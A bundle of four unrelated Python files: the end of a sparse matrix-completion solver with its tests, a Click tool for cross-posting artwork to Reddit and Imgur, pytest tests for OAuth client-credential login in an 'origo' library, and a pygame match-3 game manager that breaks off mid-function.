assert len(u.shape) == 1, 'u must be one dimensional'
assert len(v.shape) == 1, 'v must be one dimensional'
assert len(d.shape) == 1, 'd must be one dimensional'
assert 0 <= np.max(u) < m, 'An entry in u is invalid'
assert 0 <= np.max(v) < n, 'An entry in v is invalid'
if epsilon1 is None:
# The default values for epsilon1 is from bottom of page
# 12 in Lin-Cheyn-Ma.
epsilon1 = 1e-7
if epsilon2 is None:
# The default values for epsilon2 is from bottom of page
# 12 in Lin-Chen-Ma.
epsilon2 = 1e-6
# The minimum value of the observed entries of D
minD = np.min(d)
# We want to keep around a sparse matrix version of D, but we need to be
# careful about 0 values in d, we don't want them to get discarded when we
# convert to a sparse matrix! In particular, we are using the sparse matrix
# in a slightly odd way. We intend that D stores both 0 and non-zero
# values, and that the entries of D which are not stored are *unknown* (and
# not necessarily 0). Therefore, we process the input d to make all 0
# entries "small" numbers relative to its smallest value.
for i in range(len(d)):
if d[i] == 0:
d[i] = minD * epsilon1
# Create the required sparse matrices. Note, u,v,d might have
# repeats, and that is ok since the sp.coo_matrix handles
# that case, and we don't actually use d after here.
D = sp.csc_matrix(sp.coo_matrix((d, (u, v)), shape=[m, n]))
# The Frobenius norm of the observed entries of D. This is
# just the 2-norm of the *vector* of entries.
partialFrobeniusD = sparseFrobeniusNorm(D)
# The SVD of the answer A
U = np.matrix(np.zeros([m, maxRank]))
S = np.zeros([maxRank])
VT = np.matrix(np.zeros([maxRank, n]))
# Compute the largest singular values of D (assuming the unobserved entries
# are 0. I am not convinced this is principled, but I believe it it what
# they do in the paper.
dummy, S0, dummy = sparseSVDUpdate(D, U[:, 0], np.array([S[0]]), VT[0, :])
if mu_0 is None:
# The default values for mu_0 is from bottom of page
# 12 in Lin-Chen-Ma. I believe that the use the
# spectral norm of D (the largest singular value), where
# the unobserved entries are assumed to be 0.
# FIXME: I am not sure this is principled. I mean, why is 0 special?
# I am pretty sure that I can break this with a inproperly scaled D.
mu_0 = 1. / S0[0]
if rho is None:
# The default values for mu_0 is from bottom of page
# 12 in Lin-Chen-Ma.
# The flatten here is important since the ord=1 norm
# from np.linalg.norm for a matrix is max(sum(abs(x), axis=0)), which
# is *not* what we want.
rho_s = len(d) / (m * n)
rho = 1.2172 + 1.8588 * rho_s
# The sparse Lagrange multiplers
Y_0 = D * 0.0
# The projection of A onto Omega. This is not required
# but is convenient to have.
POA_0 = D * 0.0
POA_1 = D * 0.0
iteration = 0
while True:
# Break if we use too many interations
iteration += 1
if iteration > maxIteration:
break
# This is the mathematical content of the algorithm
###################################################
# The full_matrices being true is required for non-square matrices
# We know that E_0 = POA_0 - A_0 = POA_0 - U_0*S_0*VT_0
# So,
# [U,S,VT] = np.linalg.svd(D-E_0+Y_0/mu_0, full_matrices=False)
# can be rewritten as
# [U,S,VT] = np.linalg.svd(D-(POA_0 - U_0*S_0*VT_0)+Y_0/mu_0,
# full_matrices=False)
# Combining sparse terms we get
# [U,S,VT] = np.linalg.svd( (D-POA_0+Y_0/mu_0) + U_0*S_0*VT_0,
# full_matrices=False)
[U, S, VT] = minNucPlusFrob(D - POA_0 + Y_0 / mu_0, U, S, VT, mu_0)
# and we compute the projection of A onto Omega
# Note, making the temp array and then creating the sparse
# matrix all at once is *much* faster.
POA_1 = projSVD(U, S, VT, u, v)
# POATmp = np.zeros([len(d)])
# # FIXME: Needs to be numba
# for i in range(len(d)):
# POATmp[i] = U[u[i], :] * np.diag(S) * VT[:, v[i]]
# POA_1 = sp.csc_matrix(sp.coo_matrix((POATmp, (u, v)), shape=[m, n]))
# Update the Lagrange mutiplier
# We have that
# E_1 = POA_1 - A_1 = POA_1 - U_1*S_1*VT_1
# So we can plug into
# Y_1 = Y_0 + mu_0*(D-A_1-E_1)
# to get
# Y_1 = Y_0 + mu_0*(D-A_1-(POA_1 - A_1))
# so
# Y_1 = Y_0 + mu_0*(D-POA_1)
Y_1 = Y_0 + mu_0 * (D - POA_1)
###################################################
# If the method is converging well then increase mu_0 to focus
# more on the constraint. if
# mu_0*np.linalg.norm(POA_1-POA_0,ord=2)/partialFrobeniusD <
# epsilon2: Again, I don't know how to compute the spectral
# norm of a partially observed matrix, so I replace with the
# Froebenius norm on the observed entries FIXME: Attempt to
# justify later.
if (mu_0 * sparseFrobeniusNorm(POA_1 - POA_0) / partialFrobeniusD
< epsilon2):
mu_0 = rho * mu_0
# stopping criterion from page 12 of Lin, Chen, and Ma.
# criterion1 = np.linalg.norm(D-A_1-E_1, ord='fro')
# /np.linalg.norm(D, ord='fro')
# criterion1 = np.linalg.norm(D-A_1-(POA_1 - A_1), ord='fro')
# /np.linalg.norm(D, ord='fro')
# criterion1 = np.linalg.norm(D-POA_1), ord='fro')
# /np.linalg.norm(D, ord='fro')
# FIXME: I may need to justify the change from the full Froebenius
# norm to the partial one.
criterion1 = sparseFrobeniusNorm(D - POA_1) / partialFrobeniusD
# criterion2 = np.min([mu_0,np.sqrt(mu_0)])
# *np.linalg.norm(E_1-E_0, ord='fro')/np.linalg.norm(D, ord='fro')
# This is the one place where I depart from Lin-Chen-Ma. The stopping
# criterion there have right about equation uses A and POA. As I want
# the algorithm to be fast I ignore the A part, since that would be
# O(mn)
# FIXME: Need to justify
# FIXME: I may need to justify the change from the full Froebenius
# norm to the partial one.
criterion2 = np.min([mu_0, np.sqrt(mu_0)]) * \
sparseFrobeniusNorm(POA_1 - POA_0) / partialFrobeniusD
if verbose:
if iteration == 1:
print("printing")
print(("iteration criterion1 epsilon1 " +
"criterion2 epsilon2 rho mu"))
if iteration % 10 == 0:
print(('%9d %10.2e %8.2e %10.2e %8.2e %8.2e %8.2e' %
(iteration, criterion1, epsilon1, criterion2, epsilon2,
rho, mu_0)))
# If both error criterions are satisfied stop the algorithm
if criterion1 < epsilon1 and criterion2 < epsilon2:
break
Y_0 = Y_1.copy()
POA_0 = POA_1.copy()
return [U, S, VT]
def test_compare():
from dimredu.MCviaCVXPy import MC as MCCVXPy
from dimredu.MCviaIALM import MC as MCSlow
m = 5
n = 7
U = np.matrix(np.random.random(size=[m, 1]))
V = np.matrix(np.random.random(size=[n, 1]))
D = U * V.T
Omega = np.zeros([m, n])
tmp = np.random.uniform(size=[m, n])
Omega[tmp < 0.7] = 1
ACVXPy = MCCVXPy(np.multiply(Omega, D), Omega)
ASlow, ESlow = MCSlow(np.multiply(Omega, D), Omega, maxIteration=200)
u = []
v = []
d = []
for i in range(m):
for j in range(n):
if Omega[i, j]:
u.append(i)
v.append(j)
d.append(D[i, j])
u = np.array(u)
v = np.array(v)
d = np.array(d)
[U, S, VT] = MC(m, n, u, v, d, 4)
AFast = U * np.diag(S) * VT
assert np.allclose(ACVXPy, D, atol=1e-1)
assert np.allclose(ASlow, D, atol=1e-1)
assert np.allclose(AFast, D, atol=1e-1)
def profile_large():
m = 200
n = 500
samples = int(0.4 * m * n)
print(('samples', samples))
np.random.seed(1234)
origU = np.matrix(np.random.random(size=[m, 2]))
origV = np.matrix(np.random.random(size=[n, 2]))
u = []
v = []
d = []
for i in range(samples):
# Note, there may be repeats in d, but that is ok
# since the solver very early calls the coo_matrix function,
# and function gracefully handles repeats.
uTmp = np.random.randint(0, m)
vTmp = np.random.randint(0, n)
u.append(uTmp)
v.append(vTmp)
d.append(float(origU[uTmp, :] * (origV.T)[:, vTmp]))
u = np.array(u)
v = np.array(v)
d = np.array(d)
# The choice of maxRank is apparently important for convergence. Even
# though the final answer is only rank 2, we appear to need the extra
# dimensions to make it converge.
maxRank = 10
[U, S, VT] = MC(m, n, u, v, d, maxRank, rho=1.01, maxIteration=500)
# Randomly sample the errors to see how we did
errorSamples = 500
errors = np.zeros([errorSamples])
for i in range(errorSamples):
uTmp = np.random.randint(0, m)
vTmp = np.random.randint(0, n)
orig = origU[uTmp, :] * (origV.T)[:, vTmp]
computed = U[uTmp, :] * np.diag(S) * VT[:, vTmp]
errors[i] = np.abs(orig - computed)
print((np.max(errors)))
def profile():
import cProfile
cProfile.run('profile_large()', 'stats')
if __name__ == '__main__':
test_compare()
|
import logging
import warnings
import click
import validators as val
from praw.models import Submission
from sqlalchemy import sql
from tabulate import tabulate
from . import extract
from . import helper as h
from . import paramtypes as types
class EBFormatter(logging.Formatter):
def format(self, record):
if record.levelname == "INFO":
return record.getMessage()
else:
return record.levelname.title() + ": " + record.getMessage()
eb_log = logging.getLogger("errantbot")
eb_log.propagate = False
eb_log.setLevel(logging.INFO)
eb_handler = logging.StreamHandler()
eb_handler.setFormatter(EBFormatter())
eb_log.addHandler(eb_handler)
logging.basicConfig()
log = logging.getLogger("errantbot.cli")
@click.group()
@click.pass_context
def cli(ctx):
warnings.filterwarnings("ignore", r"Could not parse CHECK constraint text")
ctx.obj = h.Connections()
@cli.command()
@click.pass_obj
@click.argument("source-url", required=True, type=types.url)
@click.argument("submissions", nargs=-1, type=types.submission)
@click.option("--title", "-t")
@click.option("--artist", "-a")
@click.option("--series", "-s")
@click.option("--nsfw/--sfw", "-n/-N", default=None)
@click.option("--index", "-i", default=0, type=int)
@click.option("--album", "-l", is_flag=True)
@click.option("--no-post", "-P", is_flag=True)
@click.option("--add-sr", "-r", is_flag=True)
@click.option("--username", "-u", is_flag=True)
@click.option("--wait", "-w", type=int, default=18)
def add(
con,
source_url,
submissions,
title,
artist,
series,
nsfw,
index,
album,
no_post,
add_sr,
username,
wait,
):
submissions = h.Submissions(submissions)
if add_sr:
h.edit_subreddits(
con, tuple(n_f_t.name for n_f_t in submissions.n_f_t), upsert=False
)
work = extract.auto(source_url, index=index, album=album, username=username)
work_id = h.save_work(
con,
title or work.title,
series or work.series,
(artist,) + work.artists if artist else work.artists,
work.source_url,
nsfw or work.nsfw,
work.image_url,
)
if work_id:
h.add_submissions(con, work_id, submissions)
h.upload_to_imgur(con, work_id)
if not no_post:
h.post_submissions(con, work_id, wait=wait)
@cli.command()
@click.pass_obj
@click.argument("title", required=True)
@click.argument("artist", required=True)
@click.argument("source-url", type=types.url, required=True)
@click.argument("source-image-url", type=types.url, required=True)
@click.argument("submissions", nargs=-1, type=types.submission)
@click.option("--no-post", "-P", is_flag=True)
@click.option("--nsfw/--sfw", "-n/-N")
@click.option("--series", "-s")
@click.option("--wait", "-w", type=int, default=18)
def add_custom(
con,
title,
artist,
source_url,
source_image_url,
submissions,
no_post,
nsfw,
series,
wait,
):
submissions = h.Submissions(submissions)
work_id = h.save_work(
con, title, series, (artist,), source_url, nsfw, source_image_url
)
h.add_submissions(con, work_id, submissions)
h.upload_to_imgur(con, work_id)
if not no_post:
h.post_submissions(con, work_id, wait=wait)
@cli.command()
@click.pass_obj
@click.argument("names", type=types.subreddit, nargs=-1)
@click.option("--disabled", "-d", is_flag=True)
@click.option("--flair-id", "-l", type=types.flair_id)
@click.option("--force", "-f", is_flag=True)
@click.option("--no-space-out", "-O", is_flag=True)
@click.option("--require-flair/--no-require-flair", "-q/-Q", is_flag=True)
@click.option("--require-series", "-e", is_flag=True)
@click.option("--require-tag", "-t", is_flag=True)
@click.option("--sfw-only", "-N", is_flag=True)
@click.option("--tag-series", "-s", is_flag=True)
def sr(
con,
names,
disabled,
flair_id,
force,
require_flair,
require_series,
require_tag,
sfw_only,
no_space_out,
tag_series,
):
h.edit_subreddits(
con,
names,
disabled,
flair_id,
force,
require_flair,
require_series,
require_tag,
sfw_only,
not no_space_out,
tag_series,
)
@cli.command()
@click.pass_obj
@click.argument("work-id", type=int, required=True)
@click.argument("submissions", nargs=-1, type=types.submission)
@click.option("--add-sr", "-r", is_flag=True)
@click.option("--no-post", "-P", is_flag=True)
@click.option("--wait", "-w", type=int, default=18)
def xpost(con, work_id, submissions, no_post, add_sr, wait):
submissions = h.Submissions(submissions)
if add_sr:
h.edit_subreddits(
con, tuple(n_f_t.name for n_f_t in submissions.n_f_t), upsert=False
)
h.add_submissions(con, work_id, submissions)
if not no_post:
h.post_submissions(con, work_id, submissions, wait=wait)
@cli.command()
@click.pass_obj
@click.argument("submissions", nargs=-1, type=types.submission)
@click.option("--add-sr", "-r", is_flag=True)
@click.option("--no-post", "-P", is_flag=True)
@click.option("--wait", "-w", type=int, default=18)
def xpost_last(con, submissions, no_post, add_sr, wait):
submissions = h.Submissions(submissions)
if add_sr:
h.edit_subreddits(
con, tuple(n_f_t.name for n_f_t in submissions.n_f_t), upsert=False
)
work_id = h.get_last(con, "works")
h.add_submissions(con, work_id, submissions)
if not no_post:
h.post_submissions(con, work_id, submissions, wait=wait)
@cli.command()
@click.pass_obj
@click.argument("work-ids", type=int, nargs=-1)
@click.option("--last", "-l", is_flag=True)
@click.option("--wait", "-w", type=int, default=18)
def retry(con, work_ids, last, wait):
h.post_submissions(con, work_ids, last=last, wait=wait)
@cli.command()
@click.pass_obj
@click.option("--wait", "-w", type=int, default=18)
def retry_all(con, wait):
h.post_submissions(con, do_all=True, wait=wait)
@cli.command()
@click.pass_obj
def retry_all_uploads(con, no_wait):
h.upload_to_imgur(con, do_all=True)
@cli.command()
@click.pass_obj
@click.argument("work-ids", type=int, nargs=-1)
@click.option("--last", "-l", is_flag=True)
def retry_upload(con, work_ids, last):
h.upload_to_imgur(con, work_ids, last=last)
@cli.command()
@click.pass_obj
@click.argument("subreddit-name", type=types.subreddit, required=True)
def flairs(con, subreddit_name):
sub = h.subreddit_or_status(con.reddit, subreddit_name)
if not sub:
log.warning("/r/%s is %s", subreddit_name, sub.name.lower())
if not sub.can_assign_link_flair:
log.warning("/r/%s does not allow users to assign link flair", subreddit_name)
else:
columns = map(
lambda flair: (flair["text"], flair["id"]), sub.flair.link_templates
)
click.echo(tabulate(columns, headers=["Text", "ID"]))
@cli.command("extract")
@click.argument("url", required=True, type=types.url)
@click.option("--index", "-i", default=0, type=int)
@click.option("--album", "-l", is_flag=True)
@click.option("--username", "-u", is_flag=True)
def _extract(url, index, album, username):
work = extract.auto(url, index=index, album=album, username=username)
for field in work._fields:
attr = getattr(work, field)
attr = "'" + attr + "'" if type(attr) == str else attr
click.echo("{}:\t{}".format(field, attr))
@cli.command()
@click.pass_obj
@click.argument("names", nargs=-1, type=types.subreddit)
@click.option("--ready/--not-ready", "-r/-R", default=None)
def list_srs(con, names, ready):
sr_table = con.meta.tables["subreddits"]
sub_table = con.meta.tables["submissions"]
query = (
sql.select(
sr_table.c
+ [
sql.select([sql.func.count()])
.select_from(sub_table)
.where(sub_table.c.subreddit_id == sr_table.c.id)
.label("post_count")
]
)
.select_from(sr_table)
.order_by("id")
)
if len(names) > 0:
query = query.where(sr_table.c.name.in_(names))
if ready is True:
query = query.where(
sr_table.c.last_submission_on
< sql.func.now() - sql.text("INTERVAL '1 day'")
)
if ready is False:
query = query.where(
sr_table.c.last_submission_on
> sql.func.now() - sql.text("INTERVAL '1 day'")
)
result = con.db.execute(query)
click.echo(tabulate(result.fetchall(), headers=result.keys()))
@cli.command()
@click.pass_obj
def list_works(con):
query = sql.text(
"""SELECT title, artists.name as artist, series, imgur_url, source_url
FROM works INNER JOIN artists ON artist_id = artists.id"""
)
result = con.db.execute(query)
click.echo(tabulate(result.fetchall(), headers=result.keys()))
@cli.command()
@click.pass_obj
@click.option("--reddit-id", "-r", "id_type", flag_value="reddit", default=True)
@click.option("--submission-id", "-s", "id_type", flag_value="submission")
@click.option("--from-reddit", "-r", is_flag=True)
@click.argument("post-id", type=int)
def delete_post(con, id_type, from_reddit, post_id):
submissions = con.meta.tables["submissions"]
use_reddit = id_type == "submission"
if not use_reddit:
submission_id = post_id
query = sql.select([submissions.c.reddit_id]).where(
submissions.c.id == submission_id
)
row = con.db.execute(query).first()
if row is None:
log.error("Submission %s does not exist", submission_id)
return
reddit_id = row["reddit_id"]
else:
reddit_id = post_id
if val.url(reddit_id):
reddit_id = Submission.id_from_url(reddit_id)
if from_reddit and reddit_id:
sub = con.reddit.submission(reddit_id)
sub.delete()
sub.comments.replace_more(limit=None)
for comment in sub.comments.list():
if comment.author == con.reddit.user.me():
comment.delete()
query = submissions.update().values(reddit_id=None, submitted_on=None)
if use_reddit:
query = query.where(submissions.c.reddit_id == reddit_id)
else:
query = query.where(submissions.c.id == submission_id)
con.db.execute(query)
@cli.command()
@click.pass_obj
@click.argument("artists", nargs=-1)
def artists(con, artists):
if val.url(artists[0]):
artists = artists[1:] + extract.auto(artists[0])
h.do_artists(con, artists)
if __name__ == "__main__":
cli()
|
import json
import logging
import re
import pytest
from origo.auth.auth import Authenticate
from origo.auth.credentials.client_credentials import ClientCredentialsProvider
from origo.config import Config
from origo.exceptions import ApiAuthenticateError
from freezegun import freeze_time
from tests.origio.auth.client_credentials_test_utils import (
from_cache_not_expired_token,
from_cache_expired_token,
utc_now,
)
from tests.origio.test_utils import client_credentials_response
logging.basicConfig(level=logging.INFO)
config = Config()
token_endpoint = "https://login-test.oslo.kommune.no/auth/realms/api-catalog/protocol/openid-connect/token"
@pytest.fixture(scope="function")
def mock_home_dir(monkeypatch, tmp_path):
monkeypatch.setenv("HOME", str(tmp_path))
@freeze_time(utc_now)
class TestAuthenticate:
def test_authenticate_cache_disabled(self, requests_mock, mock_home_dir):
client_credentials_provider = ClientCredentialsProvider(config)
auth = Authenticate(config=config, token_provider=client_credentials_provider)
auth.file_cache.credentials_cache_enabled = False
response = json.dumps(client_credentials_response)
matcher = re.compile(token_endpoint)
requests_mock.register_uri("POST", matcher, text=response, status_code=204)
auth.login()
assert auth.access_token == client_credentials_response["access_token"]
assert auth.refresh_token == client_credentials_response["refresh_token"]
def test_authenticat_no_cache(self, requests_mock, mock_home_dir):
client_credentials_provider = ClientCredentialsProvider(config)
auth = Authenticate(config=config, token_provider=client_credentials_provider)
auth.file_cache.credentials_cache_enabled = True
response = json.dumps(client_credentials_response)
matcher = re.compile(token_endpoint)
requests_mock.register_uri("POST", matcher, text=response, status_code=204)
auth.login()
assert auth.access_token == client_credentials_response["access_token"]
assert auth.refresh_token == client_credentials_response["refresh_token"]
def test_authenticate_cached_credentials(self, mock_home_dir):
client_credentials_provider = ClientCredentialsProvider(config)
auth = Authenticate(config=config, token_provider=client_credentials_provider)
auth.file_cache.credentials_cache_enabled = True
cached_credentials = {
"provider": "ClientCredentialsProvider",
"access_token": from_cache_not_expired_token,
"refresh_token": from_cache_not_expired_token,
}
auth.file_cache.write_credentials(json.dumps(cached_credentials))
auth.login()
assert auth.access_token == cached_credentials["access_token"]
assert auth.refresh_token == cached_credentials["refresh_token"]
def test_authenticate_refresh_credentials(self, requests_mock, mock_home_dir):
client_credentials_provider = ClientCredentialsProvider(config)
auth = Authenticate(config=config, token_provider=client_credentials_provider)
auth.file_cache.credentials_cache_enabled = True
cached_credentials = {
"provider": "ClientCredentialsProvider",
"access_token": from_cache_not_expired_token,
"refresh_token": from_cache_not_expired_token,
}
auth.file_cache.write_credentials(json.dumps(cached_credentials))
response = json.dumps(client_credentials_response)
matcher = re.compile(token_endpoint)
requests_mock.register_uri("POST", matcher, text=response, status_code=204)
auth.login()
assert auth.access_token == cached_credentials["access_token"]
assert auth.refresh_token == cached_credentials["refresh_token"]
def test_authenticate_expired_tokens(self, requests_mock, mock_home_dir):
client_credentials_provider = ClientCredentialsProvider(config)
auth = Authenticate(config=config, token_provider=client_credentials_provider)
auth.file_cache.credentials_cache_enabled = True
cached_credentials = {
"provider": "TokenServiceProvider",
"access_token": from_cache_expired_token,
"refresh_token": from_cache_expired_token,
}
auth.file_cache.write_credentials(json.dumps(cached_credentials))
response = json.dumps(client_credentials_response)
matcher = re.compile(token_endpoint)
requests_mock.register_uri("POST", matcher, text=response, status_code=204)
auth.login()
print(from_cache_not_expired_token)
print(from_cache_expired_token)
assert auth.access_token == client_credentials_response["access_token"]
assert auth.refresh_token == client_credentials_response["access_token"]
def test_authenticate_expired_access_token(self, requests_mock, mock_home_dir):
client_credentials_provider = ClientCredentialsProvider(config)
auth = Authenticate(config=config, token_provider=client_credentials_provider)
auth.file_cache.credentials_cache_enabled = True
cached_credentials = {
"provider": "TokenServiceProvider",
"access_token": from_cache_expired_token,
"refresh_token": from_cache_not_expired_token,
}
auth.file_cache.write_credentials(json.dumps(cached_credentials))
response = json.dumps(client_credentials_response)
matcher = re.compile(token_endpoint)
requests_mock.register_uri("POST", matcher, text=response, status_code=204)
auth.login()
assert auth.access_token == from_cache_not_expired_token
assert auth.refresh_token == cached_credentials["refresh_token"]
def test_authenticate_fail(self, requests_mock, mock_home_dir):
client_credentials_provider = ClientCredentialsProvider(
config, client_id="wrong_id"
)
auth = Authenticate(config=config, token_provider=client_credentials_provider)
response = json.dumps(
{"error": "authenitcation error", "error_description": "No such client"}
)
matcher = re.compile(token_endpoint)
requests_mock.register_uri("POST", matcher, text=response, status_code=204)
try:
auth.login()
except ApiAuthenticateError:
assert True
|
# -*- encoding: utf-8 -*-
'''Game manager module.'''
# pylint: disable=fixme, line-too-long, invalid-name, undefined-variable
# pylint: disable=too-many-branches, too-many-statements, too-many-arguments
from random import randint
import pygame
from pygame.locals import * # pylint: disable=wildcard-import, unused-wildcard-import
from pygame.time import delay
from sprites import Tree, Board, Element
from sounds import Sounds, play_sound
class TreeManager:
'''Tree manager.'''
__screen_size = (900, 600)
screen = pygame.display.set_mode(__screen_size, DOUBLEBUF, 32)
fruit_list = []
fruit_image = pygame.image.load(Tree.fruit).convert_alpha()
fruit_width = fruit_image.get_width()
fruit_height = fruit_image.get_height()
type = 0 # 0 Tree, 1 Energy
energy_full = False # Energy full mark
money_empty = False # Not any money left?
def display_text(self, text, position, txt_size=25, txt_color=(255, 255, 255)):
'''Display text with given position, size and color.'''
my_font = pygame.font.SysFont(None, txt_size)
text_screen = my_font.render(text, True, txt_color)
self.screen.blit(text_screen, position)
def draw_tree(self, energy_num, money_num):
'''Draws the game tree.'''
Tree(Tree.tree, (0, 600)).draw(self.screen) # Draw tree
Tree(Tree.energy_num, Tree.energy_num_position).draw(self.screen) # Draw energy num
if energy_num > 30:
self.display_text(str(30) + '/30', (22, 55), 21)
else:
self.display_text(str(energy_num)+'/30', (22, 55), 21)
Tree(Tree.money, (15, 135)).draw(self.screen) # Draw money
self.display_text(str(money_num), (32, 124), 21)
for i in range(0, 10): # Draw fruits
Tree(Tree.fruit, Tree.position[i]).draw(self.screen)
self.display_text(str(i+1), (Tree.position[i][0]+15, Tree.position[i][1]-47))
if self.type == 1:
Tree(Tree.energy_buy, Tree.energy_buy_position).draw(self.screen)
if self.energy_full:
self.display_text('energy is full!', (430, 310), 30, (255, 0, 0))
pygame.display.flip()
delay(500)
self.energy_full = False
if self.money_empty:
self.display_text('money is not enough!', (410, 310), 30, (255, 0, 0))
pygame.display.flip()
delay(500)
self.money_empty = False
def mouse_select(self, mgr, mousex, mousey, level, energy_num, money_num):
'''Handle mouse event.'''
if self.type == 0: # Tree Scene
for i in range(0, 10):
if Tree.position[i][0] < mousex < Tree.position[i][0] + self.fruit_width \
and Tree.position[i][1] - self.fruit_height < mousey < Tree.position[i][1]:
if energy_num <= 0:
self.type = 1
else:
level = i + 1
if Tree.energy_num_position[0] < mousex < Tree.energy_num_position[0] + 60 \
and Tree.energy_num_position[1] - 60 < mousey < Tree.energy_num_position[1]: # 精力60*60
play_sound(Sounds.CLICK)
self.type = 1
else: # Energy Scene
if 408 < mousex < 600 and 263 < mousey < 313: # "Buy Energy" button clicked
play_sound(Sounds.CLICK_BUTTON)
if money_num < 50:
self.money_empty = True
if energy_num >= 30:
self.energy_full = True
elif energy_num < 30 and money_num >= 50:
energy_num += 5
money_num -= 50
elif 619 < mousex < 638 and 158 < mousey < 177: # "X" clicked
self.type = 0
mgr.level, mgr.energy_num, mgr.money = level, energy_num, money_num
# pylint: disable=too-many-public-methods, too-many-instance-attributes, too-many-nested-blocks
class Manager:
'''Game manager.'''
__screen_size = (900, 600)
screen = pygame.display.set_mode(__screen_size, DOUBLEBUF, 32)
__brick_size = 50
__bg = pygame.image.load('img/bg.png').convert()
stop_width = 63
selected = [-1, -1] # Current selected [row, col]
swap_sign = -1 # Swap sign
last_sel = [-1, -1] # Last selected [row, col]
value_swapped = False # Swapped?
death_sign = True # Death map sign
boom_sel = [-1, -1] # Eliminate 4: [row, col]
level = 0 # Current level, 0 for tree
money = 100 # Money
energy_num = 30 # Energy num
num_sign = True
type = 2 # (0) Playing, (1) Passed, (-1) Failed, (2) Tree
reset_mode = True # Reset layout?
init_step = 15 # Initial steps for each level
step = init_step # Steps left of the game
score = 0 # Score
min = 20 # Medium score 1
max = 50 # Medium score 2
animal_num = [0, 0, 0, 0, 0, 0] # Number of eliminated animals
ice_num = 0 # Number left of required ice
success_board = Board(Board.success, [200, 0]) # Success board
fail_board = Board(Board.fail, [200, 0]) # Failure board
height, width = 9, 9
row, col = 5, 5
ice_list = [[-1 for _ in range(21)] for _ in range(21)] # (-1) None, (1) Ice
animal = [[-1 for _ in range(21)] for _ in range(21)] # (-2) Elimated, (-1) None, (0-4) Animal
list_x, list_y = (__screen_size[0] - 11 * __brick_size) / 2, (__screen_size[1] - 11 * __brick_size) / 2 # Position of the blocks
def __init__(self, width, height):
self.height = height
self.width = width
self.list_x = (Manager.__screen_size[0] - self.width * Manager.__brick_size) / 2
self.list_y = (Manager.__screen_size[1] - self.height * Manager.__brick_size) / 2
self.row, self.col = Manager.xy_rc(self.list_x, self.list_y)
self.list_x, self.list_y = Manager.rc_xy(self.row, self.col)
self.ice_list = [[-1 for _ in range(21)] for _ in range(21)]
self.animal = [[-1 for _ in range(21)] for _ in range(21)]
self.reset_animals()
def reset_animals(self):
'''Reset board with random animals.'''
for row in range(self.row, self.row + self.height):
for col in range(self.col, self.col + self.width):
self.animal[row][col] = randint(0, 5)
@staticmethod
def rc_xy(row, col):
'''(row, col) -> (x, y)'''
return int(Manager.list_x + (col-Manager.col)*Manager.__brick_size), int\
(Manager.list_y+(row-Manager.row)*Manager.__brick_size)
@staticmethod
def xy_rc(x, y):
'''(x, y) -> (row, col)'''
return int((y-Manager.list_y)/Manager.__brick_size+Manager.row), int\
((x-Manager.list_x)/Manager.__brick_size+Manager.col)
@staticmethod
def draw_brick(x, y):
'''Draw a brick at (x, y).'''
brick = Element(Element.brick, (x, y))
Manager.screen.blit(brick.image, brick.rect)
def draw_task(self, task_animal_num, which_animal, \
board_position=(400, 90), animal_position=(430, 35), txt_position=(455, 60)):
'''Draw task board'''
txt_size = 24
txt_color = (0, 0, 0)
Board(Board.task_board, board_position).draw(self.screen)
if which_animal == 6:
task_animal = Element(Element.ice, animal_position)
else:
task_animal = Element(Element.animals[which_animal], animal_position)
task_animal.image = pygame.transform.smoothscale(task_animal.image, (40, 40))
task_animal.draw(self.screen)
if which_animal == 6:
if task_animal_num-self.ice_num <= 0:
Board(Board.ok, (txt_position[0], txt_position[1]+15)).draw(self.screen)
else:
self.load_text(str(task_animal_num-self.ice_num), txt_position, txt_size, txt_color)
else:
if task_animal_num - self.animal_num[which_animal] <= 0:
Board(Board.ok, (txt_position[0], txt_position[1]+15)).draw(self.screen)
else:
self.load_text(str(task_animal_num - self.animal_num[which_animal]), txt_position, txt_size, txt_color)
def draw(self):
'''Draw background, animals, and so on.'''
# Draw background
self.screen.blit(Manager.__bg, (0, 0))
# Display steps left
Board(Board.step_board, (0, 142)).draw(self.screen)
tens, single = divmod(self.step, 10)
if tens == 0:
Board(Board.num_format%single, (790, 110)).draw(self.screen)
else:
Board(Board.num_format%tens, (775, 110)).draw(self.screen)
Board(Board.num_format%single, (805, 110)).draw(self.screen)
# Display level & pause button
Board(Board.level_format%self.level, (30, 105)).draw(self.screen)
Element(Element.stop, Element.stop_position).draw(self.screen)
# Draw bricks, ice and animals
brick_group = pygame.sprite.Group()
animal_group = pygame.sprite.Group()
ice_group = pygame.sprite.Group()
for i in range(0, 21):
for j in range(0, 21):
x, y = Manager.rc_xy(i, j)
if self.animal[i][j] != -1:
brick_group.add(Element(Element.brick, (x, y)))
animal_group.add(Element(Element.animals[self.animal[i][j]], (x, y)))
if self.ice_list[i][j] != -1:
ice_group.add(Element(Element.ice, (x, y)))
brick_group.draw(self.screen)
ice_group.draw(self.screen)
for animallist in animal_group:
self.screen.blit(animallist.image, animallist.rect)
if self.level == 1:
self.draw_task(10, 4)
elif self.level == 2:
self.draw_task(21, 1)
elif self.level == 3:
self.draw_task(16, 4, (300, 90), (330, 35), (360, 60))
self.draw_task(16, 5, (500, 90), (530, 35), (560, 60))
elif self.level == 4:
self.draw_task(18, 5, (300, 90), (330, 35), (360, 60))
self.draw_task(18, 2, (500, 90), (530, 35), (560, 60))
elif self.level == 5:
self.draw_task(28, 2, (300, 90), (330, 35), (360, 60))
self.draw_task(28, 0, (500, 90), (530, 35), (560, 60))
elif self.level == 6:
self.draw_task(70, 4)
elif self.level == 7:
self.draw_task(36, 1)
self.draw_task(36, 2, (300, 90), (330, 35), (360, 60))
self.draw_task(36, 0, (500, 90), (530, 35), (560, 60))
elif self.level == 8:
self.draw_task(15, 6)
elif self.level == 9:
self.draw_task(49, 6)
else:
self.draw_task(39, 6)
# Display selected animal
if self.selected != [-1, -1]:
frame_sprite = Element(Element.frame, Manager.rc_xy(self.selected[0], self.selected[1]))
self.screen.blit(frame_sprite.image, frame_sprite.rect)
# Show score
self.load_text('Score:' + str(self.score), (300, 550), 30)
pygame.draw.rect(self.screen, (50, 150, 50, 180), Rect(300, 570, self.score * 2, 25))
pygame.draw.rect(self.screen, (100, 200, 100, 180), Rect(300, 570, 200, 25), 2)
return animal_group
def mouse_image(self):
'''Replace the mouse image with img/mouse.png'''
mouse_cursor = pygame.image.load('img/mouse.png').convert_alpha()
mouse_x, mouse_y = pygame.mouse.get_pos()
# Find the topleft position of the mouse
mouse_x -= mouse_cursor.get_width() / 2
mouse_y -= mouse_cursor.get_height() / 2
self.screen.blit(mouse_cursor, (mouse_x, mouse_y))
def mouse_select(self, mousex, mousey):
'''Handle mouse click event.'''
